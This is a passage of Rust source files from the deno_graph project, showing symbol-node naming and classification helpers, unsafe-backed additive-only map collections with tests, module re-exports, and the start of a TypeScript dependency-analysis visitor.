    // helpers for extracting a displayable name from the various key kinds
    fn ts_module_name_to_string(module_name: &TsModuleName) -> Option<&str> {
      match module_name {
        TsModuleName::Ident(ident) => Some(&ident.sym),
        TsModuleName::Str(str) => str.value.as_str(),
      }
    }
    fn maybe_key_name(key: &Key) -> Option<Cow<'_, str>> {
      match key {
        // private names keep their `#` prefix
        Key::Private(n) => Some(Cow::Owned(format!("#{}", n.name))),
        Key::Public(n) => maybe_prop_name(n),
      }
    }
    fn maybe_prop_name(prop_name: &PropName) -> Option<Cow<'_, str>> {
      match prop_name {
        PropName::Ident(n) => Some(Cow::Borrowed(&n.sym)),
        PropName::Str(n) => n.value.as_str().map(Cow::Borrowed),
        PropName::Num(n) => Some(Cow::Owned(n.value.to_string())),
        PropName::Computed(prop_name) => maybe_expr(&prop_name.expr),
        PropName::BigInt(_) => None,
      }
    }
    fn maybe_param_prop_name(param: &TsParamPropParam) -> Option<Cow<'_, str>> {
      match param {
        TsParamPropParam::Ident(ident) => Some(Cow::Borrowed(&ident.sym)),
        TsParamPropParam::Assign(assign_pat) => match &*assign_pat.left {
          Pat::Ident(ident) => Some(Cow::Borrowed(&ident.sym)),
          // NOTE(review): treated as impossible for parameter properties —
          // confirm the parser rejects these pattern kinds here
          Pat::Array(_)
          | Pat::Rest(_)
          | Pat::Object(_)
          | Pat::Assign(_)
          | Pat::Invalid(_)
          | Pat::Expr(_) => unreachable!(),
        },
      }
    }
    fn maybe_expr(expr: &Expr) -> Option<Cow<'_, str>> {
      match expr {
        Expr::Ident(n) => Some(Cow::Borrowed(&n.sym)),
        Expr::Lit(n) => match n {
          Lit::Str(n) => n.value.as_str().map(Cow::Borrowed),
          Lit::Num(n) => Some(Cow::Owned(n.value.to_string())),
          Lit::BigInt(n) => Some(Cow::Owned(n.value.to_string())),
          _ => None,
        },
        _ => None,
      }
    }
    match self {
      Self::Module(_) => None,
      Self::ClassDecl(n) => Some(Cow::Borrowed(&n.ident.sym)),
      Self::ExportDecl(_, n) => match n {
        ExportDeclRef::Class(n) => Some(Cow::Borrowed(&n.ident.sym)),
        ExportDeclRef::Fn(n) => Some(Cow::Borrowed(&n.ident.sym)),
        ExportDeclRef::Var(_, _, ident) => Some(Cow::Borrowed(&ident.sym)),
        ExportDeclRef::TsEnum(n) => Some(Cow::Borrowed(&n.id.sym)),
        ExportDeclRef::TsInterface(n) => Some(Cow::Borrowed(&n.id.sym)),
        ExportDeclRef::TsModule(n) => {
          ts_module_name_to_string(&n.id).map(Cow::Borrowed)
        }
        ExportDeclRef::TsTypeAlias(n) => Some(Cow::Borrowed(&n.id.sym)),
      },
      // default exports may be anonymous, hence the `?` on the ident
      Self::ExportDefaultDecl(n) => match &n.decl {
        DefaultDecl::Class(n) => Some(Cow::Borrowed(&n.ident.as_ref()?.sym)),
        DefaultDecl::Fn(n) => Some(Cow::Borrowed(&n.ident.as_ref()?.sym)),
        DefaultDecl::TsInterfaceDecl(n) => Some(Cow::Borrowed(&n.id.sym)),
      },
      Self::ExportDefaultExpr(_) => None,
      Self::FnDecl(n) => Some(Cow::Borrowed(&n.ident.sym)),
      Self::TsEnum(n) => Some(Cow::Borrowed(&n.id.sym)),
      Self::TsInterface(n) => Some(Cow::Borrowed(&n.id.sym)),
      Self::TsNamespace(n) => {
        ts_module_name_to_string(&n.id).map(Cow::Borrowed)
      }
      Self::TsTypeAlias(n) => Some(Cow::Borrowed(&n.id.sym)),
      Self::Var(_, _, ident) => Some(Cow::Borrowed(&ident.sym)),
      Self::UsingVar(_, _, ident) => Some(Cow::Borrowed(&ident.sym)),
      Self::AutoAccessor(n) => maybe_key_name(&n.key),
      Self::ClassMethod(n) => maybe_prop_name(&n.key),
      Self::ClassProp(n) => maybe_prop_name(&n.key),
      Self::ClassParamProp(n) => maybe_param_prop_name(&n.param),
      Self::ExpandoProperty(n) => Some(Cow::Borrowed(n.prop_name())),
      Self::TsPropertySignature(n) => maybe_expr(&n.key),
      Self::TsGetterSignature(n) => maybe_expr(&n.key),
      Self::TsSetterSignature(n) => maybe_expr(&n.key),
      Self::TsMethodSignature(n) => maybe_expr(&n.key),
      // These are unique enough names to avoid collisions with user code.
      // They allow having these as exports and resolving them.
      Self::Constructor(_) => Some(Cow::Borrowed("%%dg_ctor%%")),
      Self::TsIndexSignature(_) => Some(Cow::Borrowed("%%dg_index%%")),
      Self::TsCallSignatureDecl(_) => Some(Cow::Borrowed("%%dg_call%%")),
      Self::TsConstructSignatureDecl(_) => {
        Some(Cow::Borrowed("%%dg_construct%%"))
      }
    }
  }
// todo(dsherret): rename to is_class_decl
/// If the node is a class.
pub fn is_class(&self) -> bool {
matches!(
self,
Self::ClassDecl(_)
| Self::ExportDecl(_, ExportDeclRef::Class(_))
| Self::ExportDefaultDecl(ExportDefaultDecl {
decl: DefaultDecl::Class(_),
..
})
)
}
/// If the node is a function.
pub fn is_function(&self) -> bool {
matches!(
self,
Self::FnDecl(_)
| Self::ExportDecl(_, ExportDeclRef::Fn(_))
| Self::ExportDefaultDecl(ExportDefaultDecl {
decl: DefaultDecl::Fn(_),
..
})
)
}
/// If the node is an interface.
pub fn is_interface(&self) -> bool {
matches!(
self,
Self::TsInterface(_)
| Self::ExportDecl(_, ExportDeclRef::TsInterface(_))
| Self::ExportDefaultDecl(ExportDefaultDecl {
decl: DefaultDecl::TsInterfaceDecl(_),
..
})
)
}
/// If the node is a typescript namespace.
pub fn is_ts_namespace(&self) -> bool {
matches!(
self,
Self::TsNamespace(_) | Self::ExportDecl(_, ExportDeclRef::TsModule(_))
)
}
/// If the node is a variable.
pub fn is_var(&self) -> bool {
matches!(
self,
Self::Var(..) | Self::ExportDecl(_, ExportDeclRef::Var(..))
)
}
/// If the node is a contructor.
pub fn is_ctor(&self) -> bool {
matches!(self, Self::Constructor(_))
}
  /// If the node has a body.
  pub fn has_body(&self) -> bool {
    match self {
      SymbolNodeRef::FnDecl(n) => n.function.body.is_some(),
      SymbolNodeRef::TsNamespace(n) => n.body.is_some(),
      // NOTE(review): panics via `todo!()` — auto accessors are not
      // handled here yet
      SymbolNodeRef::AutoAccessor(_) => todo!(),
      SymbolNodeRef::ClassMethod(m) => m.function.body.is_some(),
      SymbolNodeRef::Constructor(n) => n.body.is_some(),
      SymbolNodeRef::ExportDefaultDecl(n) => match &n.decl {
        DefaultDecl::Fn(n) => n.function.body.is_some(),
        DefaultDecl::Class(_) | DefaultDecl::TsInterfaceDecl(_) => true,
      },
      SymbolNodeRef::ExportDecl(_, decl) => match decl {
        ExportDeclRef::TsModule(n) => n.body.is_some(),
        ExportDeclRef::Fn(n) => n.function.body.is_some(),
        ExportDeclRef::Class(_)
        | ExportDeclRef::TsEnum(_)
        | ExportDeclRef::TsInterface(_) => true,
        ExportDeclRef::TsTypeAlias(_) | ExportDeclRef::Var(..) => false,
      },
      // these node kinds always carry a body
      SymbolNodeRef::Module(_)
      | SymbolNodeRef::ClassDecl(_)
      | SymbolNodeRef::TsEnum(_)
      | SymbolNodeRef::TsInterface(_) => true,
      // these never have one
      SymbolNodeRef::TsTypeAlias(_)
      | SymbolNodeRef::ExportDefaultExpr(_)
      | SymbolNodeRef::Var(..)
      | SymbolNodeRef::UsingVar(..)
      | SymbolNodeRef::ClassProp(_)
      | SymbolNodeRef::ClassParamProp(_)
      | SymbolNodeRef::ExpandoProperty(..)
      | SymbolNodeRef::TsIndexSignature(_)
      | SymbolNodeRef::TsCallSignatureDecl(_)
      | SymbolNodeRef::TsConstructSignatureDecl(_)
      | SymbolNodeRef::TsPropertySignature(_)
      | SymbolNodeRef::TsGetterSignature(_)
      | SymbolNodeRef::TsSetterSignature(_)
      | SymbolNodeRef::TsMethodSignature(_) => false,
    }
  }
/// If the node is a declaration that can be found in a module.
pub fn is_module(&self) -> bool {
matches!(self, SymbolNodeRef::Module(_))
}
  /// If the node is an `export ...` / `export default ...` statement.
  pub fn has_export_keyword(&self) -> bool {
    match self {
      SymbolNodeRef::ExportDecl(..)
      | SymbolNodeRef::ExportDefaultDecl(_)
      | SymbolNodeRef::ExportDefaultExpr(_) => true,
      // exhaustive on purpose (no catch-all), so adding a variant
      // forces this match to be revisited
      SymbolNodeRef::Module(_)
      | SymbolNodeRef::ClassDecl(_)
      | SymbolNodeRef::FnDecl(_)
      | SymbolNodeRef::TsEnum(_)
      | SymbolNodeRef::TsInterface(_)
      | SymbolNodeRef::TsNamespace(_)
      | SymbolNodeRef::TsTypeAlias(_)
      | SymbolNodeRef::Var(..)
      | SymbolNodeRef::UsingVar(..)
      | SymbolNodeRef::AutoAccessor(_)
      | SymbolNodeRef::ClassMethod(_)
      | SymbolNodeRef::ClassProp(_)
      | SymbolNodeRef::ClassParamProp(_)
      | SymbolNodeRef::Constructor(_)
      | SymbolNodeRef::ExpandoProperty(_)
      | SymbolNodeRef::TsIndexSignature(_)
      | SymbolNodeRef::TsCallSignatureDecl(_)
      | SymbolNodeRef::TsConstructSignatureDecl(_)
      | SymbolNodeRef::TsPropertySignature(_)
      | SymbolNodeRef::TsGetterSignature(_)
      | SymbolNodeRef::TsSetterSignature(_)
      | SymbolNodeRef::TsMethodSignature(_) => false,
    }
  }
  /// If the node is a declaration that can be found in a module.
  pub fn is_decl(&self) -> bool {
    match self {
      SymbolNodeRef::Module(_) => false,
      SymbolNodeRef::ClassDecl(_)
      | SymbolNodeRef::ExportDecl(..)
      | SymbolNodeRef::ExportDefaultDecl(_)
      | SymbolNodeRef::ExportDefaultExpr(_)
      | SymbolNodeRef::FnDecl(_)
      | SymbolNodeRef::TsEnum(_)
      | SymbolNodeRef::TsInterface(_)
      | SymbolNodeRef::TsNamespace(_)
      | SymbolNodeRef::TsTypeAlias(_)
      | SymbolNodeRef::Var(..)
      | SymbolNodeRef::UsingVar(..) => true,
      // members of classes/interfaces are not module-level declarations
      SymbolNodeRef::AutoAccessor(_)
      | SymbolNodeRef::ClassMethod(_)
      | SymbolNodeRef::ClassProp(_)
      | SymbolNodeRef::ClassParamProp(_)
      | SymbolNodeRef::Constructor(_)
      | SymbolNodeRef::ExpandoProperty(..)
      | SymbolNodeRef::TsIndexSignature(_)
      | SymbolNodeRef::TsCallSignatureDecl(_)
      | SymbolNodeRef::TsConstructSignatureDecl(_)
      | SymbolNodeRef::TsPropertySignature(_)
      | SymbolNodeRef::TsGetterSignature(_)
      | SymbolNodeRef::TsSetterSignature(_)
      | SymbolNodeRef::TsMethodSignature(_) => false,
    }
  }
/// If the node is a member found in a class or interface.
pub fn is_member(&self) -> bool {
match self {
SymbolNodeRef::Module(_)
| SymbolNodeRef::ClassDecl(_)
| SymbolNodeRef::ExportDecl(..)
| SymbolNodeRef::ExportDefaultDecl(_)
| SymbolNodeRef::ExportDefaultExpr(_)
| SymbolNodeRef::FnDecl(_)
| SymbolNodeRef::TsEnum(_)
| SymbolNodeRef::TsInterface(_)
| SymbolNodeRef::TsNamespace(_)
| SymbolNodeRef::TsTypeAlias(_)
| SymbolNodeRef::Var(..)
| SymbolNodeRef::UsingVar(..) => false,
SymbolNodeRef::AutoAccessor(_)
| SymbolNodeRef::ClassMethod(_)
| SymbolNodeRef::ClassProp(_)
| SymbolNodeRef::ClassParamProp(_)
| SymbolNodeRef::Constructor(_)
| SymbolNodeRef::ExpandoProperty(..)
| SymbolNodeRef::TsIndexSignature(_)
| SymbolNodeRef::TsCallSignatureDecl(_)
| SymbolNodeRef::TsConstructSignatureDecl(_)
| SymbolNodeRef::TsPropertySignature(_)
| SymbolNodeRef::TsGetterSignature(_)
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/symbols/collections.rs | src/symbols/collections.rs | // Copyright 2018-2024 the Deno authors. MIT license.
#![allow(dead_code)]
use indexmap::IndexMap;
use std::cell::UnsafeCell;
use std::collections::HashMap;
// Generates an "additive only" map type backed by the given map kind.
macro_rules! define_map {
  ($name:ident, $kind:ident) => {
    /// A map that supports inserting data while holding references to
    /// the underlying data at another key. Due to this property, the values
    /// in the hashmap can never be replaced or removed. Inserting data at a
    /// previously inserted to key will cause a panic.
    pub struct $name<K, V> {
      // store the values in a box to ensure the references are always stored
      // in the same place. Uses an UnsafeCell for faster performance.
      data: UnsafeCell<$kind<K, Box<V>>>,
    }
    impl<K, V> Default for $name<K, V> {
      fn default() -> Self {
        Self {
          data: Default::default(),
        }
      }
    }
    impl<K, V> $name<K, V> {
      #[cfg(test)]
      pub fn with_capacity(capacity: usize) -> Self {
        Self {
          data: UnsafeCell::new($kind::with_capacity(capacity)),
        }
      }
      pub fn len(&self) -> usize {
        // SAFETY: shared read of the cell; no reference escapes this method
        let data = unsafe { &*self.data.get() };
        data.len()
      }
    }
    impl<K: Eq + std::hash::Hash, V> $name<K, V> {
      /// Consumes the map and returns the underlying storage.
      pub fn take(self) -> $kind<K, Box<V>> {
        self.data.into_inner()
      }
      pub fn contains_key(&self, key: &K) -> bool {
        // SAFETY: shared read of the cell; no reference escapes this method
        let data = unsafe { &*self.data.get() };
        data.contains_key(key)
      }
      pub fn insert(&self, key: K, value: V) {
        // SAFETY: boxed values are never moved or dropped by inserts, so
        // references handed out by `get` remain valid across a resize
        let data = unsafe { &mut *self.data.get() };
        // assert that we never replace any data
        assert!(data.insert(key, Box::new(value)).is_none());
      }
      pub fn get<'a>(&'a self, key: &K) -> Option<&'a V> {
        unsafe {
          let data = &*self.data.get();
          // this is ok because we never remove from the map
          data
            .get(key)
            .map(|value_box| value_box.as_ref() as *const V)
            .map(|raw| &*raw)
        }
      }
    }
  };
}
// HashMap-backed and insertion-order-preserving (IndexMap) variants.
define_map!(AdditiveOnlyMap, HashMap);
define_map!(AdditiveOnlyIndexMap, IndexMap);
// Generates an additive-only map for `Copy` values, returning values by
// copy from `get` instead of by reference.
macro_rules! define_map_for_copy_values {
  ($name:ident, $kind:ident) => {
    /// An additive hash map for data that is `Copy`. This is slightly more
    /// optimized than `AdditiveOnlyMap` because it won't copy the value.
    pub struct $name<K, V: Copy> {
      data: UnsafeCell<$kind<K, V>>,
    }
    impl<K, V: Copy> Default for $name<K, V> {
      fn default() -> Self {
        Self {
          data: Default::default(),
        }
      }
    }
    impl<K, V: Copy> $name<K, V> {
      pub fn len(&self) -> usize {
        // SAFETY: shared read of the cell; no reference escapes this method
        let data = unsafe { &*self.data.get() };
        data.len()
      }
      /// Consumes the map and returns the underlying storage.
      pub fn take(self) -> $kind<K, V> {
        self.data.into_inner()
      }
    }
    impl<K: Eq + std::hash::Hash, V: Copy> $name<K, V> {
      pub fn contains_key(&self, key: &K) -> bool {
        // SAFETY: shared read of the cell; no reference escapes this method
        let data = unsafe { &*self.data.get() };
        data.contains_key(key)
      }
      pub fn insert(&self, key: K, value: V) {
        // SAFETY: `get` returns copies rather than references, so mutating
        // the storage here cannot invalidate anything handed out earlier
        let data = unsafe { &mut *self.data.get() };
        data.insert(key, value);
      }
      pub fn get(&self, key: &K) -> Option<V> {
        unsafe {
          let data = &*self.data.get();
          data.get(key).copied()
        }
      }
    }
  };
}
// HashMap-backed and insertion-order-preserving (IndexMap) variants.
define_map_for_copy_values!(AdditiveOnlyMapForCopyValues, HashMap);
define_map_for_copy_values!(AdditiveOnlyIndexMapForCopyValues, IndexMap);
#[cfg(test)]
mod test {
  use super::*;
  #[test]
  fn should_support_adding_while_holding_ref_to_value() {
    struct Value {
      value: usize,
    }
    // use a low capacity which will ensure the map is resized once we exceed it
    let map: AdditiveOnlyMap<usize, Value> = AdditiveOnlyMap::with_capacity(2);
    map.insert(0, Value { value: 987 });
    let data = map.get(&0).unwrap();
    for i in 1..100 {
      map.insert(i, Value { value: i });
    }
    // the reference taken before the resizes must still read the same value
    assert_eq!(data.value, 987);
    assert_eq!(map.get(&0).unwrap().value, 987);
    assert_eq!(map.get(&99).unwrap().value, 99);
    assert!(map.contains_key(&99));
    assert!(!map.contains_key(&100));
  }
  #[test]
  fn support_copy_map() {
    let map: AdditiveOnlyMapForCopyValues<usize, usize> =
      AdditiveOnlyMapForCopyValues::default();
    map.insert(1, 2);
    assert_eq!(map.get(&1), Some(2));
    assert_eq!(map.get(&0), None);
  }
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/symbols/mod.rs | src/symbols/mod.rs | // Copyright 2018-2024 the Deno authors. MIT license.
pub use self::analyzer::EsModuleInfo;
pub use self::analyzer::ExpandoPropertyRef;
pub use self::analyzer::ExportDeclRef;
pub use self::analyzer::FileDep;
pub use self::analyzer::FileDepName;
pub use self::analyzer::JsonModuleInfo;
pub use self::analyzer::ModuleId;
pub use self::analyzer::ModuleInfo;
pub use self::analyzer::ModuleInfoRef;
pub use self::analyzer::RootSymbol;
pub use self::analyzer::Symbol;
pub use self::analyzer::SymbolDecl;
pub use self::analyzer::SymbolDeclKind;
pub use self::analyzer::SymbolId;
pub use self::analyzer::SymbolNodeRef;
pub use self::analyzer::UniqueSymbolId;
pub use self::cross_module::Definition;
pub use self::cross_module::DefinitionKind;
pub use self::cross_module::DefinitionOrUnresolved;
pub use self::cross_module::DefinitionPathLink;
pub use self::cross_module::DefinitionPathNode;
pub use self::cross_module::DefinitionPathNodeResolved;
pub use self::cross_module::ModuleExports;
pub use self::cross_module::ResolvedExport;
pub use self::cross_module::ResolvedExportOrReExportAllPath;
pub use self::cross_module::ResolvedReExportAllPath;
pub use self::cross_module::ResolvedSymbolDepEntry;
pub use self::cross_module::UnresolvedSpecifier;
pub use self::dep_analyzer::ResolveDepsMode;
pub use self::dep_analyzer::SymbolNodeDep;
mod analyzer;
mod collections;
mod cross_module;
mod dep_analyzer;
mod swc_helpers;
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/symbols/dep_analyzer.rs | src/symbols/dep_analyzer.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use deno_ast::swc::ast::ArrowExpr;
use deno_ast::swc::ast::BindingIdent;
use deno_ast::swc::ast::BlockStmtOrExpr;
use deno_ast::swc::ast::Class;
use deno_ast::swc::ast::DefaultDecl;
use deno_ast::swc::ast::Expr;
use deno_ast::swc::ast::Function;
use deno_ast::swc::ast::Id;
use deno_ast::swc::ast::Ident;
use deno_ast::swc::ast::Lit;
use deno_ast::swc::ast::MemberExpr;
use deno_ast::swc::ast::MemberProp;
use deno_ast::swc::ast::Param;
use deno_ast::swc::ast::ParamOrTsParamProp;
use deno_ast::swc::ast::Pat;
use deno_ast::swc::ast::PropName;
use deno_ast::swc::ast::TsAsExpr;
use deno_ast::swc::ast::TsCallSignatureDecl;
use deno_ast::swc::ast::TsConstructSignatureDecl;
use deno_ast::swc::ast::TsEnumDecl;
use deno_ast::swc::ast::TsExprWithTypeArgs;
use deno_ast::swc::ast::TsGetterSignature;
use deno_ast::swc::ast::TsImportType;
use deno_ast::swc::ast::TsIndexSignature;
use deno_ast::swc::ast::TsInterfaceDecl;
use deno_ast::swc::ast::TsMethodSignature;
use deno_ast::swc::ast::TsParamProp;
use deno_ast::swc::ast::TsParamPropParam;
use deno_ast::swc::ast::TsPropertySignature;
use deno_ast::swc::ast::TsQualifiedName;
use deno_ast::swc::ast::TsSetterSignature;
use deno_ast::swc::ast::TsTupleElement;
use deno_ast::swc::ast::TsTypeAliasDecl;
use deno_ast::swc::ast::TsTypeAnn;
use deno_ast::swc::ast::TsTypeAssertion;
use deno_ast::swc::ast::TsTypeParam;
use deno_ast::swc::ast::TsTypeParamDecl;
use deno_ast::swc::ast::TsTypeParamInstantiation;
use deno_ast::swc::ast::VarDeclarator;
use deno_ast::swc::ecma_visit::Visit;
use deno_ast::swc::ecma_visit::VisitWith;
use super::ExportDeclRef;
use super::SymbolNodeRef;
use super::swc_helpers::ts_entity_name_to_parts;
use super::swc_helpers::ts_qualified_name_parts;
/// A dependency of a symbol's declaration node on another identifier.
#[derive(Debug, Clone, PartialEq, Eq, Hash)]
pub enum SymbolNodeDep {
  /// Plain identifier reference.
  Id(Id),
  /// Qualified reference: the base identifier plus the member path parts.
  QualifiedId(Id, Vec<String>),
  /// `import("<specifier>")` type reference plus the member path parts.
  ImportType(String, Vec<String>),
}
impl From<Id> for SymbolNodeDep {
fn from(value: Id) -> Self {
Self::Id(value)
}
}
/// Controls which positions dependency resolution visits.
#[derive(Debug, Copy, Clone)]
pub enum ResolveDepsMode {
  /// Resolve dependencies of types only (used for deno doc).
  TypesOnly,
  /// Resolve dependencies of types and expressions (used for fast check).
  TypesAndExpressions,
}

impl ResolveDepsMode {
  /// Whether expression (non-type) positions should be visited.
  pub fn visit_exprs(&self) -> bool {
    matches!(self, ResolveDepsMode::TypesAndExpressions)
  }
}
/// Collects the identifier dependencies of the given symbol node,
/// honoring the provided resolution mode.
pub fn resolve_deps(
  node_ref: SymbolNodeRef,
  mode: ResolveDepsMode,
) -> Vec<SymbolNodeDep> {
  let mut visitor = DepsFiller {
    deps: Vec::new(),
    mode,
  };
  visitor.fill(node_ref);
  visitor.deps
}
/// Visitor state that accumulates a node's dependencies.
struct DepsFiller {
  // dependencies collected so far
  deps: Vec<SymbolNodeDep>,
  // whether expression positions are visited in addition to types
  mode: ResolveDepsMode,
}
impl DepsFiller {
  /// Dispatches to the visitor methods appropriate for the node kind,
  /// visiting only the positions relevant to `self.mode`.
  fn fill(&mut self, node_ref: SymbolNodeRef<'_>) {
    match node_ref {
      SymbolNodeRef::Module(_) | SymbolNodeRef::TsNamespace(_) => {
        // no deps, as this has children
      }
      SymbolNodeRef::ClassDecl(n) => {
        self.visit_class(&n.class);
      }
      SymbolNodeRef::ExportDecl(_, n) => match n {
        ExportDeclRef::Class(n) => self.visit_class(&n.class),
        ExportDeclRef::Fn(n) => self.visit_function(&n.function),
        ExportDeclRef::Var(_, n, _) => {
          self.visit_var_declarator(n);
        }
        ExportDeclRef::TsEnum(n) => self.visit_ts_enum_decl(n),
        ExportDeclRef::TsInterface(n) => self.visit_ts_interface_decl(n),
        ExportDeclRef::TsModule(_) => {
          // no deps, as this has children
        }
        ExportDeclRef::TsTypeAlias(n) => self.visit_ts_type_alias_decl(n),
      },
      SymbolNodeRef::ExportDefaultDecl(n) => match &n.decl {
        DefaultDecl::Class(n) => self.visit_class(&n.class),
        DefaultDecl::Fn(n) => {
          self.visit_function(&n.function);
        }
        DefaultDecl::TsInterfaceDecl(n) => {
          self.visit_ts_interface_decl(n);
        }
      },
      SymbolNodeRef::ExportDefaultExpr(n) => {
        self.visit_expr(&n.expr);
      }
      SymbolNodeRef::FnDecl(n) => self.visit_function(&n.function),
      SymbolNodeRef::TsEnum(n) => {
        self.visit_ts_enum_decl(n);
      }
      SymbolNodeRef::TsInterface(n) => self.visit_ts_interface_decl(n),
      SymbolNodeRef::TsTypeAlias(n) => {
        self.visit_ts_type_alias_decl(n);
      }
      SymbolNodeRef::Var(_, n, _) | SymbolNodeRef::UsingVar(_, n, _) => {
        self.visit_var_declarator(n);
      }
      SymbolNodeRef::AutoAccessor(n) => {
        if let Some(type_ann) = &n.type_ann {
          self.visit_ts_type_ann(type_ann)
        }
      }
      SymbolNodeRef::ClassMethod(n) => {
        // the key is only a dependency when expressions are visited
        // (it may be a computed name)
        if self.mode.visit_exprs() {
          self.visit_prop_name(&n.key);
        }
        if let Some(type_params) = &n.function.type_params {
          self.visit_ts_type_param_decl(type_params)
        }
        for param in &n.function.params {
          self.visit_param(param)
        }
        if let Some(return_type) = &n.function.return_type {
          self.visit_ts_type_ann(return_type)
        }
      }
      SymbolNodeRef::ClassProp(n) => {
        if self.mode.visit_exprs() {
          self.visit_prop_name(&n.key);
        }
        // prefer the explicit type annotation; otherwise the initializer
        // determines the dependency
        if let Some(type_ann) = &n.type_ann {
          self.visit_ts_type_ann(type_ann);
        } else if let Some(value) = &n.value {
          let visited_type_assertion = self.visit_type_if_type_assertion(value);
          if !visited_type_assertion && self.mode.visit_exprs() {
            self.visit_expr(value);
          }
        }
      }
      SymbolNodeRef::ClassParamProp(n) => self.visit_ts_param_prop(n),
      SymbolNodeRef::Constructor(n) => {
        for param in &n.params {
          match param {
            ParamOrTsParamProp::TsParamProp(param) => {
              self.visit_ts_param_prop(param)
            }
            ParamOrTsParamProp::Param(param) => self.visit_param(param),
          }
        }
      }
      SymbolNodeRef::ExpandoProperty(n) => {
        if self.mode.visit_exprs() {
          self.visit_expr(n.assignment());
        }
      }
      SymbolNodeRef::TsIndexSignature(n) => {
        self.visit_ts_index_signature(n);
      }
      SymbolNodeRef::TsCallSignatureDecl(n) => {
        self.visit_ts_call_signature_decl(n);
      }
      SymbolNodeRef::TsConstructSignatureDecl(n) => {
        self.visit_ts_construct_signature_decl(n);
      }
      SymbolNodeRef::TsPropertySignature(n) => {
        self.visit_ts_property_signature(n);
      }
      SymbolNodeRef::TsGetterSignature(n) => {
        self.visit_ts_getter_signature(n);
      }
      SymbolNodeRef::TsSetterSignature(n) => {
        self.visit_ts_setter_signature(n);
      }
      SymbolNodeRef::TsMethodSignature(n) => {
        self.visit_ts_method_signature(n);
      }
    }
  }

  /// Visits `expr` only when it is an `as` / `<T>` type assertion,
  /// returning whether it was visited.
  fn visit_type_if_type_assertion(&mut self, expr: &Expr) -> bool {
    if matches!(expr, Expr::TsAs(_) | Expr::TsTypeAssertion(_)) {
      self.visit_expr(expr);
      true
    } else {
      false
    }
  }
}
impl Visit for DepsFiller {
  // only the parameter and return type annotations contribute deps
  fn visit_ts_index_signature(&mut self, n: &TsIndexSignature) {
    for param in &n.params {
      self.visit_ts_fn_param(param)
    }
    if let Some(type_ann) = &n.type_ann {
      self.visit_ts_type_ann(type_ann)
    }
  }
  // type params, params, and return type contribute deps
  fn visit_ts_call_signature_decl(&mut self, n: &TsCallSignatureDecl) {
    if let Some(type_params) = &n.type_params {
      self.visit_ts_type_param_decl(type_params);
    }
    for param in &n.params {
      self.visit_ts_fn_param(param);
    }
    if let Some(type_ann) = &n.type_ann {
      self.visit_ts_type_ann(type_ann)
    }
  }
  // type params, params, and return type contribute deps
  fn visit_ts_construct_signature_decl(
    &mut self,
    n: &TsConstructSignatureDecl,
  ) {
    if let Some(type_params) = &n.type_params {
      self.visit_ts_type_param_decl(type_params);
    }
    for param in &n.params {
      self.visit_ts_fn_param(param);
    }
    if let Some(type_ann) = &n.type_ann {
      self.visit_ts_type_ann(type_ann)
    }
  }
  fn visit_ts_property_signature(&mut self, n: &TsPropertySignature) {
    // a computed key is itself an expression dependency
    if n.computed {
      self.visit_expr(&n.key);
    }
    if let Some(type_ann) = &n.type_ann {
      self.visit_ts_type_ann(type_ann)
    }
  }
  fn visit_ts_getter_signature(&mut self, n: &TsGetterSignature) {
    // a computed key is itself an expression dependency
    if n.computed {
      self.visit_expr(&n.key);
    }
    if let Some(type_ann) = &n.type_ann {
      self.visit_ts_type_ann(type_ann)
    }
  }
  fn visit_ts_setter_signature(&mut self, n: &TsSetterSignature) {
    // a computed key is itself an expression dependency
    if n.computed {
      self.visit_expr(&n.key);
    }
    self.visit_ts_fn_param(&n.param);
  }
fn visit_ts_method_signature(&mut self, n: &TsMethodSignature) {
if n.computed {
self.visit_expr(&n.key);
}
if let Some(type_params) = &n.type_params {
self.visit_ts_type_param_decl(type_params);
}
for param in &n.params {
self.visit_ts_fn_param(param)
}
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann)
}
}
fn visit_class(&mut self, n: &Class) {
if let Some(type_params) = &n.type_params {
self.visit_ts_type_param_decl(type_params);
}
if let Some(expr) = &n.super_class {
self.visit_expr(expr);
}
if let Some(type_params) = &n.super_type_params {
self.visit_ts_type_param_instantiation(type_params)
}
for expr in &n.implements {
self.visit_ts_expr_with_type_args(expr);
}
}
fn visit_ts_enum_decl(&mut self, n: &TsEnumDecl) {
for member in &n.members {
if let Some(init) = &member.init {
self.visit_expr(init);
}
}
}
fn visit_function(&mut self, n: &Function) {
if let Some(type_params) = &n.type_params {
self.visit_ts_type_param_decl(type_params);
}
for param in &n.params {
self.visit_param(param);
}
if let Some(return_type) = &n.return_type {
self.visit_ts_type_ann(return_type);
}
}
fn visit_arrow_expr(&mut self, n: &ArrowExpr) {
if let Some(type_params) = &n.type_params {
self.visit_ts_type_param_decl(type_params);
}
for param in &n.params {
self.visit_pat(param);
}
if let Some(return_type) = &n.return_type {
self.visit_ts_type_ann(return_type);
} else if let BlockStmtOrExpr::Expr(expr) = &*n.body {
self.visit_expr(expr);
}
}
fn visit_ts_interface_decl(&mut self, n: &TsInterfaceDecl) {
if let Some(type_params) = &n.type_params {
self.visit_ts_type_param_decl(type_params);
}
for extends in &n.extends {
self.visit_ts_expr_with_type_args(extends);
}
}
fn visit_ts_type_alias_decl(&mut self, n: &TsTypeAliasDecl) {
if let Some(type_params) = &n.type_params {
self.visit_ts_type_param_decl(type_params);
}
self.visit_ts_type(&n.type_ann)
}
fn visit_var_declarator(&mut self, n: &VarDeclarator) {
self.visit_pat(&n.name);
if !pat_has_type_ann(&n.name)
&& let Some(init) = &n.init
{
let visited_type_assertion = self.visit_type_if_type_assertion(init);
if !visited_type_assertion && self.mode.visit_exprs() {
self.visit_expr(init);
}
}
}
fn visit_prop_name(&mut self, key: &PropName) {
match key {
PropName::Computed(computed) => {
self.visit_expr(&computed.expr);
}
// property name idents aren't a dep
PropName::Ident(_)
| PropName::Str(_)
| PropName::Num(_)
| PropName::BigInt(_) => {
// ignore
}
}
}
